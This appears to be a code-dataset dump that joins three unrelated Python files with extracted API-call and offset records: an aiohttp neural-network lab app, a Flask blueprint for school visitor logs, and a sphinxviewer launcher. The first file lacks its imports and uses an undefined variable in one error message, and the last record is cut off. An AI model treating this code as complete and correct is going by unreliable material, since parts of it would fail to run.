from aiohttp.client import MultiDict
from source import fit_model, vectorize, model_predict
routes = web.RouteTableDef()
PORT = 8080
base_url = f"http://localhost:{PORT}"
IMGS, X, Y = 3, 5, 7
THRESH = 0.1
networks = {}
@routes.get('/')
async def setup(request: web.Request):
raise web.HTTPFound(location=f"{base_url}/fit/{IMGS}:{X}-{Y}")
@routes.get('/fit/{imgs}:{x}-{y}')
@aiohttp_jinja2.template('fit.html')
async def web_fit(request: web.Request):
imgs = request.match_info['imgs']
x = request.match_info['x']
y = request.match_info['y']
return {
'base_url': base_url,
'imgs': int(imgs),
'x': int(x),
'y': int(y),
}
@routes.post('/change')
async def change_dim(request: web.Request):
data = await request.post()
raise web.HTTPFound(location=f"{base_url}/fit/{data['imgs'] or IMGS}:{data['x'] or X}-{data['y'] or Y}")
def _create_images(x, y, imgs, data):
images = [[[-1 for _ in range(x)]
for _ in range(y)]
for img in range(imgs)]
for key in data.keys():
k, key = key.split(':')
i, j = key.split('-')
i, j, k = int(i), int(j), int(k)
images[k][j][i] = 1
return [vectorize(im) for im in images]
def _create_image(x, y, data):
image = [[-1 for _ in range(x)] for _ in range(y)]
for key in data.keys():
i, j = key.split('-')
i, j = int(i), int(j)
image[j][i] = 1
return vectorize(image)
@routes.post('/fit')
async def fit(request: web.Request):
data = await request.post()
data = MultiDict(data)
imgs = data.pop('imgs')
imgs = int(imgs)
# Проверяем количество образов
if imgs < 0:
raise web.HTTPBadRequest(text=f"Invalid images number: {imgs}")
x = data.pop('x')
x = int(x)
y = data.pop('y')
y = int(y)
# Проверяем размеры образов
if x * y < 15 or x * y > 50:
raise web.HTTPBadRequest(text=f"Invalid XY combination: X={x}, Y={y}, XY={x * y}")
# Создаем матрицы всех образов
images = _create_images(x, y, imgs, data)
token = secrets.token_hex(8)
networks[token] = ((x, y, imgs), images, fit_model(images))
raise web.HTTPFound(location=f"{base_url}/predict/{token}")
@routes.get('/weights/{token}')
async def get_weights(request: web.Request):
token = request.match_info['token']
raise web.HTTPOk(text=str(networks[token][-1]))
@routes.get('/predict/{token}')
@aiohttp_jinja2.template('predict.html')
async def web_predict(request: web.Request):
token = request.match_info['token']
randomize = request.url.query.get('randomize') or THRESH
try:
randomize = float(randomize)
except ValueError:
randomize = THRESH
if randomize < 0. or randomize > 1.:
raise web.HTTPBadRequest(text=f"Probability value exceeds [0, 1] limits: randomize={by}")
(x, y, imgs), images, weights = networks[token]
# Случайно изменяем образ, если опция была указана
if request.url.query.get('randomize'):
images = [[-val if random.random() < randomize else val
for val in im]
for im in images]
im_idx = random.randrange(0, imgs)
return {
'x': x,
'y': y,
'image': images[im_idx],
'token': token,
'randomize': randomize
}
@routes.post('/predict/{token}')
@aiohttp_jinja2.template('result.html')
async def predict(request: web.Request):
token = request.match_info['token']
data = await request.post()
(x, y, _), images, weights = networks[token]
image = _create_image(x, y, data)
output, state = model_predict(weights, images, image)
return {
'x': x,
'y': y,
'input': image,
'output': output,
'state': int(state)
}
def create():
app = web.Application()
app.add_routes(routes)
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader('lab07/templates'))
web.run_app(app, port=PORT)
if __name__ == '__main__':
create()
| [
"aiohttp.web.run_app",
"aiohttp.client.MultiDict",
"secrets.token_hex",
"random.randrange",
"aiohttp.web.HTTPFound",
"aiohttp.web.Application",
"source.vectorize",
"random.random",
"aiohttp.web.HTTPBadRequest",
"source.fit_model",
"aiohttp.web.RouteTableDef",
"aiohttp_jinja2.template",
"jinj... | [((194, 213), 'aiohttp.web.RouteTableDef', 'web.RouteTableDef', ([], {}), '()\n', (211, 213), False, 'from aiohttp import web\n'), ((476, 511), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""fit.html"""'], {}), "('fit.html')\n", (499, 511), False, 'import aiohttp_jinja2\n'), ((2556, 2595), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""predict.html"""'], {}), "('predict.html')\n", (2579, 2595), False, 'import aiohttp_jinja2\n'), ((3480, 3518), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""result.html"""'], {}), "('result.html')\n", (3503, 3518), False, 'import aiohttp_jinja2\n'), ((381, 437), 'aiohttp.web.HTTPFound', 'web.HTTPFound', ([], {'location': 'f"""{base_url}/fit/{IMGS}:{X}-{Y}"""'}), "(location=f'{base_url}/fit/{IMGS}:{X}-{Y}')\n", (394, 437), False, 'from aiohttp import web\n'), ((887, 990), 'aiohttp.web.HTTPFound', 'web.HTTPFound', ([], {'location': 'f"""{base_url}/fit/{data[\'imgs\'] or IMGS}:{data[\'x\'] or X}-{data[\'y\'] or Y}"""'}), '(location=\n f"{base_url}/fit/{data[\'imgs\'] or IMGS}:{data[\'x\'] or X}-{data[\'y\'] or Y}")\n', (900, 990), False, 'from aiohttp import web\n'), ((1559, 1575), 'source.vectorize', 'vectorize', (['image'], {}), '(image)\n', (1568, 1575), False, 'from source import fit_model, vectorize, model_predict\n'), ((1679, 1694), 'aiohttp.client.MultiDict', 'MultiDict', (['data'], {}), '(data)\n', (1688, 1694), False, 'from aiohttp.client import MultiDict\n'), ((2198, 2218), 'secrets.token_hex', 'secrets.token_hex', (['(8)'], {}), '(8)\n', (2215, 2218), False, 'import secrets\n'), ((2295, 2348), 'aiohttp.web.HTTPFound', 'web.HTTPFound', ([], {'location': 'f"""{base_url}/predict/{token}"""'}), "(location=f'{base_url}/predict/{token}')\n", (2308, 2348), False, 'from aiohttp import web\n'), ((3279, 3304), 'random.randrange', 'random.randrange', (['(0)', 'imgs'], {}), '(0, imgs)\n', (3295, 3304), False, 'import random\n'), ((3741, 3778), 'source.model_predict', 'model_predict', (['weights', 'images', 'image'], {}), '(weights, images, image)\n', (3754, 3778), False, 'from source import fit_model, vectorize, model_predict\n'), ((3935, 3952), 'aiohttp.web.Application', 'web.Application', ([], {}), '()\n', (3950, 3952), False, 'from aiohttp import web\n'), ((4067, 4094), 'aiohttp.web.run_app', 'web.run_app', (['app'], {'port': 'PORT'}), '(app, port=PORT)\n', (4078, 4094), False, 'from aiohttp import web\n'), ((1310, 1323), 'source.vectorize', 'vectorize', (['im'], {}), '(im)\n', (1319, 1323), False, 'from source import fit_model, vectorize, model_predict\n'), ((1812, 1869), 'aiohttp.web.HTTPBadRequest', 'web.HTTPBadRequest', ([], {'text': 'f"""Invalid images number: {imgs}"""'}), "(text=f'Invalid images number: {imgs}')\n", (1830, 1869), False, 'from aiohttp import web\n'), ((2026, 2102), 'aiohttp.web.HTTPBadRequest', 'web.HTTPBadRequest', ([], {'text': 'f"""Invalid XY combination: X={x}, Y={y}, XY={x * y}"""'}), "(text=f'Invalid XY combination: X={x}, Y={y}, XY={x * y}')\n", (2044, 2102), False, 'from aiohttp import web\n'), ((2265, 2282), 'source.fit_model', 'fit_model', (['images'], {}), '(images)\n', (2274, 2282), False, 'from source import fit_model, vectorize, model_predict\n'), ((2895, 2983), 'aiohttp.web.HTTPBadRequest', 'web.HTTPBadRequest', ([], {'text': 'f"""Probability value exceeds [0, 1] limits: randomize={by}"""'}), "(text=\n f'Probability value exceeds [0, 1] limits: randomize={by}')\n", (2913, 2983), False, 'from aiohttp import web\n'), ((4018, 4060), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['"""lab07/templates"""'], {}), "('lab07/templates')\n", (4041, 4060), False, 'import jinja2\n'), ((3158, 3173), 'random.random', 'random.random', ([], {}), '()\n', (3171, 3173), False, 'import random\n')] |
from flask import Blueprint, render_template, url_for, session, flash, redirect, request
from edu_visitor import db
from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm
from edu_visitor.models import StudentLog, VisitorLog
from flask_login import login_required
visitor_logs = Blueprint('visitor_logs', __name__)
# Route to the sign-in page for students
@visitor_logs.route('/student-signin', methods=['GET', 'POST'])
def student_signin():
form = StudentSignInForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = StudentLog(student_name=form.student_name.data, grade=form.grade.data, parent_name=form.parent.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='In')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed in to { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('student-signin.html', title='Student Sign-in', form=form)
# Route to the sign-out page for students
@visitor_logs.route('/student-signout', methods=['GET', 'POST'])
def student_signout():
form = StudentSignOutForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = StudentLog(student_name=form.student_name.data, grade=form.grade.data, parent_name=form.parent.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='Out')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed out of { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('student-signout.html', title='Student Sign-out', form=form)
# Route to the sign-in page for visitors
@visitor_logs.route('/visitor-signin', methods=['GET', 'POST'])
def visitor_signin():
form = VisitorSignInForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = VisitorLog(visitor_name=form.visitor_name.data, student_name=form.student_name.data, grade=form.grade.data, reason=form.reason.data, reason_other=form.reason_other.data, building=session['site'], direction='In')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed in to { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('visitor-signin.html', title='Visitor Sign-in', form=form)
# Route to the sign-out page for visitors
@visitor_logs.route('/visitor-signout', methods=['GET', 'POST'])
def visitor_signout():
form = VisitorSignOutForm()
if form.validate_on_submit():
# Create an entry to add to the database
post = VisitorLog(visitor_name=form.visitor_name.data, building=session['site'], direction='Out')
db.session.add(post)
db.session.commit()
flash(f"You have successfully signed out of { session['site'] }!",
category='success')
return redirect(url_for('main.home'))
return render_template('visitor-signout.html', title='Visitor Sign-out', form=form)
# Route to display a summary of the day's student sign-ins and sign-outs
@visitor_logs.route('/daily-summary')
@login_required
def daily_summary():
# TODO: Create DB calls to create the dictionaries only for the current day
# Query database for student visitor logs entering the building and get the correct page to display from the URL
student_page_in = request.args.get('student_page_in', 1, type=int)
student_log_in = StudentLog.query.order_by(StudentLog.id.desc()).filter_by(direction='In', building=session['site']).paginate(page=student_page_in, per_page=5)
# Query database for student visitor logs leaving the building
student_page_out = request.args.get('student_page_out', 1, type=int)
student_log_out = StudentLog.query.order_by(StudentLog.id.desc()).filter_by(direction='Out', building=session['site']).paginate(page=student_page_out, per_page=5)
# Query database for visitor logs entering the building
visitor_page_in = request.args.get('visitor_page_in', 1, type=int)
visitor_log_in = VisitorLog.query.order_by(VisitorLog.id.desc()).filter_by(direction='In', building=session['site']).paginate(page=visitor_page_in, per_page=5)
# Query database for visitor logs leaving the building
visitor_page_out = request.args.get('visitor_page_out', 1, type=int)
visitor_log_out = VisitorLog.query.order_by(VisitorLog.id.desc()).filter_by(direction='Out', building=session['site']).paginate(page=visitor_page_out, per_page=5)
return render_template('daily-summary.html', student_log_in=student_log_in, student_log_out=student_log_out, visitor_log_in=visitor_log_in, visitor_log_out=visitor_log_out, title='Daily Summary')
# A route to view a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>')
@login_required
def view_student_signin(post_id):
post = StudentLog.query.get_or_404(post_id)
return render_template('student-view.html', title="Update Entry", post=post)
# A route to update a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/update', methods=['GET', 'POST'])
@login_required
def update_student_signin(post_id):
post = StudentLog.query.get_or_404(post_id)
form = StudentUpdateForm()
if form.validate_on_submit():
post.student_name = form.student_name.data
post.grade = form.grade.data
post.parent_name = form.parent.data
post.reason = form.reason.data
post.reason_other = form.reason_other.data
post.direction = form.direction.data
db.session.commit()
flash("Your post has been updated.", 'success')
return redirect(url_for('visitor_logs.daily_summary'))
# Pre-populate the form
elif request.method == 'GET':
form.student_name.data = post.student_name
form.grade.data = post.grade
form.parent.data = post.parent_name
form.reason.data = post.reason
form.reason_other.data = post.reason_other
form.direction.data = post.direction
return render_template('student-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for students
@visitor_logs.route('/student-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_student_signin(post_id):
post = StudentLog.query.get_or_404(post_id)
db.session.delete(post)
db.session.commit()
flash('The entry has been deleted.', category='success')
return redirect(url_for('visitor_logs.daily_summary'))
# A route to view a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>')
@login_required
def view_visitor_signin(post_id):
post = VisitorLog.query.get_or_404(post_id)
return render_template('visitor_logs.visitor-view.html', title="Update Entry", post=post)
# A route to update a specific post for visitors
@visitor_logs.route('/visitor-signin/<int:post_id>/update', methods=['GET', 'POST'])
@login_required
def update_visitor_signin(post_id):
post = VisitorLog.query.get_or_404(post_id)
form = VisitorUpdateForm()
if form.validate_on_submit():
post.visitor_name = form.visitor_name.data
post.student_name = form.student_name.data
post.grade = form.grade.data
post.reason = form.reason.data
post.reason_other = form.reason_other.data
post.direction = form.direction.data
db.session.commit()
flash("Your post has been updated.", 'success')
return redirect(url_for('visitor_logs.daily_summary'))
# Pre-populate the form
elif request.method == 'GET':
form.visitor_name.data = post.visitor_name
form.student_name.data = post.student_name
form.grade.data = post.grade
form.reason.data = post.reason
form.reason_other.data = post.reason_other
form.direction.data = post.direction
return render_template('visitor-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for visitor
@visitor_logs.route('/visitor-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_visitor_signin(post_id):
post = VisitorLog.query.get_or_404(post_id)
db.session.delete(post)
db.session.commit()
flash('The entry has been deleted.', category='success')
return redirect(url_for('visitor_logs.daily_summary')) | [
"flask.render_template",
"flask.request.args.get",
"edu_visitor.db.session.delete",
"edu_visitor.models.VisitorLog",
"edu_visitor.db.session.commit",
"edu_visitor.models.StudentLog.query.get_or_404",
"edu_visitor.visitor_logs.forms.StudentSignInForm",
"flask.flash",
"edu_visitor.visitor_logs.forms.V... | [((384, 419), 'flask.Blueprint', 'Blueprint', (['"""visitor_logs"""', '__name__'], {}), "('visitor_logs', __name__)\n", (393, 419), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((560, 579), 'edu_visitor.visitor_logs.forms.StudentSignInForm', 'StudentSignInForm', ([], {}), '()\n', (577, 579), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((1105, 1179), 'flask.render_template', 'render_template', (['"""student-signin.html"""'], {'title': '"""Student Sign-in"""', 'form': 'form'}), "('student-signin.html', title='Student Sign-in', form=form)\n", (1120, 1179), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1323, 1343), 'edu_visitor.visitor_logs.forms.StudentSignOutForm', 'StudentSignOutForm', ([], {}), '()\n', (1341, 1343), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((1871, 1947), 'flask.render_template', 'render_template', (['"""student-signout.html"""'], {'title': '"""Student Sign-out"""', 'form': 'form'}), "('student-signout.html', title='Student Sign-out', form=form)\n", (1886, 1947), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2088, 2107), 'edu_visitor.visitor_logs.forms.VisitorSignInForm', 'VisitorSignInForm', ([], {}), '()\n', (2105, 2107), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((2640, 2714), 'flask.render_template', 'render_template', (['"""visitor-signin.html"""'], {'title': '"""Visitor Sign-in"""', 'form': 'form'}), "('visitor-signin.html', title='Visitor Sign-in', form=form)\n", (2655, 2714), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2858, 2878), 'edu_visitor.visitor_logs.forms.VisitorSignOutForm', 'VisitorSignOutForm', ([], {}), '()\n', (2876, 2878), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((3291, 3367), 'flask.render_template', 'render_template', (['"""visitor-signout.html"""'], {'title': '"""Visitor Sign-out"""', 'form': 'form'}), "('visitor-signout.html', title='Visitor Sign-out', form=form)\n", (3306, 3367), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((3737, 3785), 'flask.request.args.get', 'request.args.get', (['"""student_page_in"""', '(1)'], {'type': 'int'}), "('student_page_in', 1, type=int)\n", (3753, 3785), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4040, 4089), 'flask.request.args.get', 'request.args.get', (['"""student_page_out"""', '(1)'], {'type': 'int'}), "('student_page_out', 1, type=int)\n", (4056, 4089), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4339, 4387), 'flask.request.args.get', 'request.args.get', (['"""visitor_page_in"""', '(1)'], {'type': 'int'}), "('visitor_page_in', 1, type=int)\n", (4355, 4387), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4634, 4683), 'flask.request.args.get', 'request.args.get', (['"""visitor_page_out"""', '(1)'], {'type': 'int'}), "('visitor_page_out', 1, type=int)\n", (4650, 4683), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((4862, 5058), 'flask.render_template', 'render_template', (['"""daily-summary.html"""'], {'student_log_in': 'student_log_in', 'student_log_out': 'student_log_out', 'visitor_log_in': 'visitor_log_in', 'visitor_log_out': 'visitor_log_out', 'title': '"""Daily Summary"""'}), "('daily-summary.html', student_log_in=student_log_in,\n student_log_out=student_log_out, visitor_log_in=visitor_log_in,\n visitor_log_out=visitor_log_out, title='Daily Summary')\n", (4877, 5058), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((5214, 5250), 'edu_visitor.models.StudentLog.query.get_or_404', 'StudentLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (5241, 5250), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((5262, 5331), 'flask.render_template', 'render_template', (['"""student-view.html"""'], {'title': '"""Update Entry"""', 'post': 'post'}), "('student-view.html', title='Update Entry', post=post)\n", (5277, 5331), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((5531, 5567), 'edu_visitor.models.StudentLog.query.get_or_404', 'StudentLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (5558, 5567), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((5579, 5598), 'edu_visitor.visitor_logs.forms.StudentUpdateForm', 'StudentUpdateForm', ([], {}), '()\n', (5596, 5598), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((6387, 6473), 'flask.render_template', 'render_template', (['"""student-update.html"""'], {'title': '"""Update Entry"""', 'post': 'post', 'form': 'form'}), "('student-update.html', title='Update Entry', post=post,\n form=form)\n", (6402, 6473), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((6662, 6698), 'edu_visitor.models.StudentLog.query.get_or_404', 'StudentLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (6689, 6698), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((6703, 6726), 'edu_visitor.db.session.delete', 'db.session.delete', (['post'], {}), '(post)\n', (6720, 6726), False, 'from edu_visitor import db\n'), ((6731, 6750), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (6748, 6750), False, 'from edu_visitor import db\n'), ((6755, 6811), 'flask.flash', 'flash', (['"""The entry has been deleted."""'], {'category': '"""success"""'}), "('The entry has been deleted.', category='success')\n", (6760, 6811), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7034, 7070), 'edu_visitor.models.VisitorLog.query.get_or_404', 'VisitorLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (7061, 7070), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((7082, 7168), 'flask.render_template', 'render_template', (['"""visitor_logs.visitor-view.html"""'], {'title': '"""Update Entry"""', 'post': 'post'}), "('visitor_logs.visitor-view.html', title='Update Entry',\n post=post)\n", (7097, 7168), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7364, 7400), 'edu_visitor.models.VisitorLog.query.get_or_404', 'VisitorLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (7391, 7400), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((7412, 7431), 'edu_visitor.visitor_logs.forms.VisitorUpdateForm', 'VisitorUpdateForm', ([], {}), '()\n', (7429, 7431), False, 'from edu_visitor.visitor_logs.forms import StudentSignInForm, StudentSignOutForm, VisitorSignInForm, VisitorSignOutForm, StudentUpdateForm, VisitorUpdateForm\n'), ((8234, 8320), 'flask.render_template', 'render_template', (['"""visitor-update.html"""'], {'title': '"""Update Entry"""', 'post': 'post', 'form': 'form'}), "('visitor-update.html', title='Update Entry', post=post,\n form=form)\n", (8249, 8320), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((8508, 8544), 'edu_visitor.models.VisitorLog.query.get_or_404', 'VisitorLog.query.get_or_404', (['post_id'], {}), '(post_id)\n', (8535, 8544), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((8549, 8572), 'edu_visitor.db.session.delete', 'db.session.delete', (['post'], {}), '(post)\n', (8566, 8572), False, 'from edu_visitor import db\n'), ((8577, 8596), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (8594, 8596), False, 'from edu_visitor import db\n'), ((8601, 8657), 'flask.flash', 'flash', (['"""The entry has been deleted."""'], {'category': '"""success"""'}), "('The entry has been deleted.', category='success')\n", (8606, 8657), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((678, 891), 'edu_visitor.models.StudentLog', 'StudentLog', ([], {'student_name': 'form.student_name.data', 'grade': 'form.grade.data', 'parent_name': 'form.parent.data', 'reason': 'form.reason.data', 'reason_other': 'form.reason_other.data', 'building': "session['site']", 'direction': '"""In"""'}), "(student_name=form.student_name.data, grade=form.grade.data,\n parent_name=form.parent.data, reason=form.reason.data, reason_other=\n form.reason_other.data, building=session['site'], direction='In')\n", (688, 891), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((891, 911), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (905, 911), False, 'from edu_visitor import db\n'), ((920, 939), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (937, 939), False, 'from edu_visitor import db\n'), ((948, 1036), 'flask.flash', 'flash', (['f"""You have successfully signed in to {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed in to {session[\'site\']}!", category=\n \'success\')\n', (953, 1036), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1442, 1656), 'edu_visitor.models.StudentLog', 'StudentLog', ([], {'student_name': 'form.student_name.data', 'grade': 'form.grade.data', 'parent_name': 'form.parent.data', 'reason': 'form.reason.data', 'reason_other': 'form.reason_other.data', 'building': "session['site']", 'direction': '"""Out"""'}), "(student_name=form.student_name.data, grade=form.grade.data,\n parent_name=form.parent.data, reason=form.reason.data, reason_other=\n form.reason_other.data, building=session['site'], direction='Out')\n", (1452, 1656), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((1656, 1676), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (1670, 1676), False, 'from edu_visitor import db\n'), ((1685, 1704), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1702, 1704), False, 'from edu_visitor import db\n'), ((1713, 1802), 'flask.flash', 'flash', (['f"""You have successfully signed out of {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed out of {session[\'site\']}!", category=\n \'success\')\n', (1718, 1802), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2206, 2430), 'edu_visitor.models.VisitorLog', 'VisitorLog', ([], {'visitor_name': 'form.visitor_name.data', 'student_name': 'form.student_name.data', 'grade': 'form.grade.data', 'reason': 'form.reason.data', 'reason_other': 'form.reason_other.data', 'building': "session['site']", 'direction': '"""In"""'}), "(visitor_name=form.visitor_name.data, student_name=form.\n student_name.data, grade=form.grade.data, reason=form.reason.data,\n reason_other=form.reason_other.data, building=session['site'],\n direction='In')\n", (2216, 2430), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((2426, 2446), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (2440, 2446), False, 'from edu_visitor import db\n'), ((2455, 2474), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2472, 2474), False, 'from edu_visitor import db\n'), ((2483, 2571), 'flask.flash', 'flash', (['f"""You have successfully signed in to {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed in to {session[\'site\']}!", category=\n \'success\')\n', (2488, 2571), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2977, 3071), 'edu_visitor.models.VisitorLog', 'VisitorLog', ([], {'visitor_name': 'form.visitor_name.data', 'building': "session['site']", 'direction': '"""Out"""'}), "(visitor_name=form.visitor_name.data, building=session['site'],\n direction='Out')\n", (2987, 3071), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((3076, 3096), 'edu_visitor.db.session.add', 'db.session.add', (['post'], {}), '(post)\n', (3090, 3096), False, 'from edu_visitor import db\n'), ((3105, 3124), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3122, 3124), False, 'from edu_visitor import db\n'), ((3133, 3222), 'flask.flash', 'flash', (['f"""You have successfully signed out of {session[\'site\']}!"""'], {'category': '"""success"""'}), '(f"You have successfully signed out of {session[\'site\']}!", category=\n \'success\')\n', (3138, 3222), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((5908, 5927), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (5925, 5927), False, 'from edu_visitor import db\n'), ((5936, 5983), 'flask.flash', 'flash', (['"""Your post has been updated."""', '"""success"""'], {}), "('Your post has been updated.', 'success')\n", (5941, 5983), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((6832, 6869), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (6839, 6869), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7748, 7767), 'edu_visitor.db.session.commit', 'db.session.commit', ([], {}), '()\n', (7765, 7767), False, 'from edu_visitor import db\n'), ((7776, 7823), 'flask.flash', 'flash', (['"""Your post has been updated."""', '"""success"""'], {}), "('Your post has been updated.', 'success')\n", (7781, 7823), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((8678, 8715), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (8685, 8715), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1072, 1092), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (1079, 1092), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((1838, 1858), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (1845, 1858), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((2607, 2627), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (2614, 2627), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((3258, 3278), 'flask.url_for', 'url_for', (['"""main.home"""'], {}), "('main.home')\n", (3265, 3278), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((6008, 6045), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (6015, 6045), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((7848, 7885), 'flask.url_for', 'url_for', (['"""visitor_logs.daily_summary"""'], {}), "('visitor_logs.daily_summary')\n", (7855, 7885), False, 'from flask import Blueprint, render_template, url_for, session, flash, redirect, request\n'), ((3833, 3853), 'edu_visitor.models.StudentLog.id.desc', 'StudentLog.id.desc', ([], {}), '()\n', (3851, 3853), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((4138, 4158), 'edu_visitor.models.StudentLog.id.desc', 'StudentLog.id.desc', ([], {}), '()\n', (4156, 4158), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((4435, 4455), 'edu_visitor.models.VisitorLog.id.desc', 'VisitorLog.id.desc', ([], {}), '()\n', (4453, 4455), False, 'from edu_visitor.models import StudentLog, VisitorLog\n'), ((4732, 4752), 'edu_visitor.models.VisitorLog.id.desc', 'VisitorLog.id.desc', ([], {}), '()\n', (4750, 4752), False, 'from edu_visitor.models import StudentLog, VisitorLog\n')] |
import os
import sys
from argparse import ArgumentParser
from sphinxviewer.sphinx import build_html
from sphinxviewer.server import serve_server
def main():
parser = ArgumentParser(description="Live editing sphinx doc server")
# parser.add_argument("-p", "--port", default=8888, help="Port to run server on")
# parser.add_argument("-d", "--build-dir", default="_build", help="Build directory")
_ = parser.parse_args()
print("Building initial docs")
# TODO Parameterize source and build directories. Currently follows
# the defaults for sphinx.
success = build_html(os.getcwd(), "_build")
if not success:
sys.exit(1)
serve_server(8888)
| [
"sphinxviewer.server.serve_server",
"sys.exit",
"argparse.ArgumentParser",
"os.getcwd"
